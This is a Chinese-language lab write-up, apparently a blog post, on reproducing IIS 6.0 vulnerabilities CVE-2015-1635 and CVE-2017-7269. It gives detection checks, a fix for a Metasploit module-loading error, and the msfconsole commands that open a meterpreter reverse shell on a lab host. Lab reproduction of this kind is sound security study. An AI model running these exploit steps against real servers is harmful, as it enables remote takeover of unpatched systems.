参考:
win10,7安装不了吧。用xp或者2003安装:
- https://www.jianshu.com/p/223e39350478
- https://jingyan.baidu.com/article/09ea3ede7ab8d7c0aede39c0.html
然后访问:http://127.0.0.1
CVE-2015-1635
响应状态码为416,或者字响应符串存在 "Requested Range Not Satisfiable"即可。
CVE-2017-7269
利用条件:
开启WebDav功能(具体为PROPFIND方法,成功则返回207或者200)
后来发现有一定的误报,且回显payload不会构造,于是用这种逻辑:
flag2 = "IIS/6.0" # 确保是IIS 6.0 减少误报
if status_code == '207' and flag2 in resp:
return True
参考:
https://thief.one/2017/03/29/IIS6-0%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E-CVE-2017-7269/
尝试加载msf的module,但是发现出错:
[09/09/2020 01:12:20] [e(0)] core: /opt/metasploit-framework/embedded/framework/modules/exploits/windows/iis/cve-2017-7269.rb failed to load - Msf::Modules::Error Failed to load module (windows/iis/cve-2017-7269 from /opt/metasploit-framework/embedded/framework/modules/exploits/windows/iis/cve-2017-7269.rb) due to invalid module filename (must be lowercase alphanumeric snake case)
查了一下才知道模块名里不能出现-。
参考:
- https://github.com/rapid7/metasploit-framework/issues/11536
- https://blog.csdn.net/Fly_hps/article/details/79568430
将这个里面的文件:https://github.com/Al1ex/CVE-2017-7269/blob/master/cve-2017-7269.rb
放到metasploit相应目录下,然后启动msfconsole:
use exploit/windows/iis/iis_webdav_cve_2017_7269
set RHOSTS 192.168.85.136
set HttpHost 192.168.85.136
set LHOST 192.168.85.129
exploit
即可得到一个meterpreter的shell:
POC运行时会产生溢出,没法执行第二次,可以选择重启。(重启了很多次…)
参考:
- https://www.t00ls.net/articles-3898
- iis6.0(cve-2017-7269)最完整的利用,从远程利用,到本地提权,再到常见失败原因
- https://github.com/zcgonvh/cve-2017-7269/blob/master/cve-2017-7269.rb
395
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
